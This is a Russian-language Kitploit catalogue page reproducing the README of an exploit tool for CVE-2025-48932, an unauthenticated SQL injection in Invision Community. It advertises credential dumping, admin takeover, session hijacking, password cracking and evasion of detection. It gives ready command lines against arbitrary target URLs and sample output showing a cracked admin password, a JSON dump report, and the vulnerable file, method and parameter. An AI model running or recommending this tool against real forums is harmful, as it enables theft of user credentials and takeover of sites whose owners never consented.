Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 — Эксплойт неаутентифицированной SQL-инъекции для Invision Community ≤ 4.7.20. Полностью автоматизированная эксплуатация с перечислением базы данных, дампом учётных данных, захватом администратора, перехватом сессий и многопоточностью. Не требует зависимостей. Инструмент для исследований в области безопасности от Sudeepa Wanigarathna. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхСбор информацииПост-эксплуатацияВеб-безопасностьТестирование на Проникновение

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2025-48932 — Эксплойт неаутентифицированной SQL-инъекции для Invision Community ≤ 4.7.20. Полностью автоматизированная эксплуатация с перечислением базы данных, дампом учётных данных, захватом администратора, перехватом сессий и многопоточностью. Не требует зависимостей. Инструмент для исследований в области безопасности от Sudeepa Wanigarathna.

GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

Репозиторий
1171 месяц назадЕщё не проверено
Поделиться

🔓 CVE-2025-48932 — эксплойт SQL-инъекции в Invision Community

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ Обзор критической уязвимости

CVE-2025-48932 — это критическая неаутентифицированная слепая SQL-инъекция, обнаруженная в Invision Community версиях ≤ 4.7.20. Этот эксплойт позволяет удалённым злоумышленникам:

  • 🔍 Извлекать конфиденциальную информацию из базы данных
  • 👤 Похищать учётные данные пользователей и хэши паролей
  • 🔑 Захватывать учётные записи администраторов
  • 🎯 Перехватывать активные пользовательские сессии
  • 💻 Достигать удалённого выполнения кода (RCE) через захват учётной записи администратора
  • 📊 Выгружать содержимое всей базы данных

🎯 Возможности

ВозможностьОписаниеСтатус
🚀 Ноль зависимостейЧистая стандартная библиотека Python — не требуется pip install✅
⚡ МногопоточностьМолниеносное извлечение данных с настраиваемым количеством потоков✅
🤖 Полная автоматизацияПолная цепочка эксплуатации: от обнаружения до формирования отчёта✅
👑 Захват администратораПерехват сессий и повышение привилегий✅
🔑 Извлечение учётных данныхИзвлечение пользователей, хэшей паролей, email-адресов✅
🔓 Взлом паролейВстроенный подбор хэшей с поддержкой словарей✅
📋 Отчёты в JSONСтруктурированный вывод для анализа и документации✅
🔌 Поддержка проксиИнтеграция с Burp Suite и пользовательскими прокси✅
🎨 Цветной выводКрасивое оформление вывода в терминале с индикаторами прогресса✅
🛡️ Ограничение скоростиВстроенные задержки для предотвращения обнаружения✅

📊 Демонстрация и скриншоты

Запуск эксплойта

$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

Пример JSON-вывода

{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 Быстрый старт

Установка

# Клонируйте репозиторий
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# Устанавливать зависимости не нужно! Просто запустите.

Базовое использование

# Проверка, уязвима ли цель
python3 exploit.py -u https://example.com --check-only

# Полная эксплуатация с подробным выводом
python3 exploit.py -u https://example.com -v

# С прокси (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# Сохранение результатов в пользовательский файл
python3 exploit.py -u https://example.com -o results.json

# Многопоточное извлечение (быстрее)
python3 exploit.py -u https://example.com -t 10

# Выгрузка всех доступных данных
python3 exploit.py -u https://example.com --dump-all

Расширенное использование

# С пользовательским словарём для взлома паролей
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# Тихий режим (без вывода, только отчёт)
python3 exploit.py -u https://example.com -o silent_report.json

# Режим отладки с подробными ошибками
python3 exploit.py -u https://example.com -v --debug

📋 Требования

Системные требования

  • Python: 3.6 или выше
  • ОС: Linux, Windows, macOS (любая ОС с Python)
  • Память: минимально (~50 МБ ОЗУ)
  • Диск: ~100 КБ (только эксплойт)

Зависимости

✅ Без внешних зависимостей!
✅ Только чистая стандартная библиотека Python!
✅ Не нужны pip install или виртуальное окружение!

Необязательно (для взлома паролей)

  • Словарь: rockyou.txt или любой пользовательский словарь
    # Загрузите популярный словарь
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ Технические подробности

Расположение уязвимости

  • Файл: /applications/calendar/modules/front/calendar/view.php
  • Метод: IPS\calendar\modules\front\calendar\view::search()
  • Параметр: location (ввод, предоставленный пользователем)
  • Тип: слепая SQL-инъекция на основе булевых условий

Вектор атаки

GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]

Цепочка эксплуатации

Скачать инструмент